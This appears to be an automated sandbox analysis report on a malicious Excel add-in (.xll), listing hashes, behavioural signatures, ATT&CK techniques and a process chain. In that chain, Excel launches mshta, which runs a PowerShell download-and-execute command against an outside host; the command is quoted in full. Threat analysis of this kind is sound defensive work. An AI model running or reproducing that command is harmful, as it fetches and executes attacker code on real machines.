Analysis

  • max time kernel
    101s
  • max time network
    130s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    22-05-2024 22:53

General

  • Target

    dc9b9848f504cb404d09c8462201ad25db8dfb2d2789a2f7dc8449ee82599618.xll

  • Size

    12KB

  • MD5

    52703d411fd572b76c4c45428f615b8d

  • SHA1

    ac99152916654579e16464a11d0e31b7e2c35e3c

  • SHA256

    dc9b9848f504cb404d09c8462201ad25db8dfb2d2789a2f7dc8449ee82599618

  • SHA512

    06204c56ad2e3fc064619b03ce67bc7f7ebe0ca2c6ade5bca0d10e46ec97b9c25eca76974944d493ab9c8c0930b08565a3edf72655bee1dfb941b90ce0b14720

  • SSDEEP

    192:3L29RBzDzeobchBj8JONRONu+ruurEPEjr7AhW:b29jnbcvYJOO86uuvr7CW

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\dc9b9848f504cb404d09c8462201ad25db8dfb2d2789a2f7dc8449ee82599618.xll"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2656
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2220
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4348

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\J6994X5U\d[1].htm
    Filesize

    2KB

    MD5

    f754844cfb65838d1dd6b19dde5d835c

    SHA1

    b3eb677783adc88c8d048898449e04d49f416db6

    SHA256

    3644b387519f3509a1ce3d2201e2e1e8af36217138cc6f9e62d6e37c887097a6

    SHA512

    f42f89562b5c0be86dbd04683ee6c30711155acd1239e273da726c2bfedf5d0806c479b7107792c136bff6e97efb8d9145df0c176f499f86f1b7e304a2e3ccdf

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ijosngnf.ec5.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\dc9b9848f504cb404d09c8462201ad25db8dfb2d2789a2f7dc8449ee82599618.xll
    Filesize

    12KB

    MD5

    52703d411fd572b76c4c45428f615b8d

    SHA1

    ac99152916654579e16464a11d0e31b7e2c35e3c

    SHA256

    dc9b9848f504cb404d09c8462201ad25db8dfb2d2789a2f7dc8449ee82599618

    SHA512

    06204c56ad2e3fc064619b03ce67bc7f7ebe0ca2c6ade5bca0d10e46ec97b9c25eca76974944d493ab9c8c0930b08565a3edf72655bee1dfb941b90ce0b14720

  • memory/2656-18-0x00007FFFAE520000-0x00007FFFAE729000-memory.dmp
    Filesize

    2.0MB

  • memory/2656-69-0x00007FFFAE520000-0x00007FFFAE729000-memory.dmp
    Filesize

    2.0MB

  • memory/2656-8-0x00007FFFAE520000-0x00007FFFAE729000-memory.dmp
    Filesize

    2.0MB

  • memory/2656-7-0x00007FFFAE520000-0x00007FFFAE729000-memory.dmp
    Filesize

    2.0MB

  • memory/2656-9-0x00007FFFAE520000-0x00007FFFAE729000-memory.dmp
    Filesize

    2.0MB

  • memory/2656-5-0x00007FFF6E5B0000-0x00007FFF6E5C0000-memory.dmp
    Filesize

    64KB

  • memory/2656-16-0x00007FFF6BA10000-0x00007FFF6BA20000-memory.dmp
    Filesize

    64KB

  • memory/2656-11-0x00007FFFAE520000-0x00007FFFAE729000-memory.dmp
    Filesize

    2.0MB

  • memory/2656-10-0x00007FFF6BA10000-0x00007FFF6BA20000-memory.dmp
    Filesize

    64KB

  • memory/2656-12-0x00007FFFAE520000-0x00007FFFAE729000-memory.dmp
    Filesize

    2.0MB

  • memory/2656-14-0x00007FFFAE520000-0x00007FFFAE729000-memory.dmp
    Filesize

    2.0MB

  • memory/2656-15-0x00007FFFAE520000-0x00007FFFAE729000-memory.dmp
    Filesize

    2.0MB

  • memory/2656-13-0x00007FFFAE520000-0x00007FFFAE729000-memory.dmp
    Filesize

    2.0MB

  • memory/2656-17-0x00007FFFAE520000-0x00007FFFAE729000-memory.dmp
    Filesize

    2.0MB

  • memory/2656-19-0x00007FFFAE520000-0x00007FFFAE729000-memory.dmp
    Filesize

    2.0MB

  • memory/2656-21-0x00007FFFAE520000-0x00007FFFAE729000-memory.dmp
    Filesize

    2.0MB

  • memory/2656-20-0x00007FFFAE520000-0x00007FFFAE729000-memory.dmp
    Filesize

    2.0MB

  • memory/2656-4-0x00007FFFAE520000-0x00007FFFAE729000-memory.dmp
    Filesize

    2.0MB

  • memory/2656-2-0x00007FFF6E5B0000-0x00007FFF6E5C0000-memory.dmp
    Filesize

    64KB

  • memory/2656-6-0x00007FFF6E5B0000-0x00007FFF6E5C0000-memory.dmp
    Filesize

    64KB

  • memory/2656-0-0x00007FFF6E5B0000-0x00007FFF6E5C0000-memory.dmp
    Filesize

    64KB

  • memory/2656-89-0x00007FFFAE520000-0x00007FFFAE729000-memory.dmp
    Filesize

    2.0MB

  • memory/2656-87-0x00007FFF6E5B0000-0x00007FFF6E5C0000-memory.dmp
    Filesize

    64KB

  • memory/2656-88-0x00007FFF6E5B0000-0x00007FFF6E5C0000-memory.dmp
    Filesize

    64KB

  • memory/2656-86-0x00007FFF6E5B0000-0x00007FFF6E5C0000-memory.dmp
    Filesize

    64KB

  • memory/2656-85-0x00007FFF6E5B0000-0x00007FFF6E5C0000-memory.dmp
    Filesize

    64KB

  • memory/2656-1-0x00007FFFAE5C3000-0x00007FFFAE5C4000-memory.dmp
    Filesize

    4KB

  • memory/2656-3-0x00007FFF6E5B0000-0x00007FFF6E5C0000-memory.dmp
    Filesize

    64KB

  • memory/2656-68-0x00007FFFAE5C3000-0x00007FFFAE5C4000-memory.dmp
    Filesize

    4KB

  • memory/2656-67-0x00007FFFAE520000-0x00007FFFAE729000-memory.dmp
    Filesize

    2.0MB

  • memory/4348-59-0x0000000007190000-0x000000000780A000-memory.dmp
    Filesize

    6.5MB

  • memory/4348-60-0x0000000006090000-0x00000000060AA000-memory.dmp
    Filesize

    104KB

  • memory/4348-58-0x0000000005B90000-0x0000000005BDC000-memory.dmp
    Filesize

    304KB

  • memory/4348-57-0x0000000005B60000-0x0000000005B7E000-memory.dmp
    Filesize

    120KB

  • memory/4348-56-0x00000000056C0000-0x0000000005A17000-memory.dmp
    Filesize

    3.3MB

  • memory/4348-46-0x00000000054E0000-0x0000000005546000-memory.dmp
    Filesize

    408KB

  • memory/4348-47-0x0000000005550000-0x00000000055B6000-memory.dmp
    Filesize

    408KB

  • memory/4348-45-0x0000000004CC0000-0x0000000004CE2000-memory.dmp
    Filesize

    136KB

  • memory/4348-44-0x0000000004E40000-0x000000000546A000-memory.dmp
    Filesize

    6.2MB

  • memory/4348-43-0x00000000026E0000-0x0000000002716000-memory.dmp
    Filesize

    216KB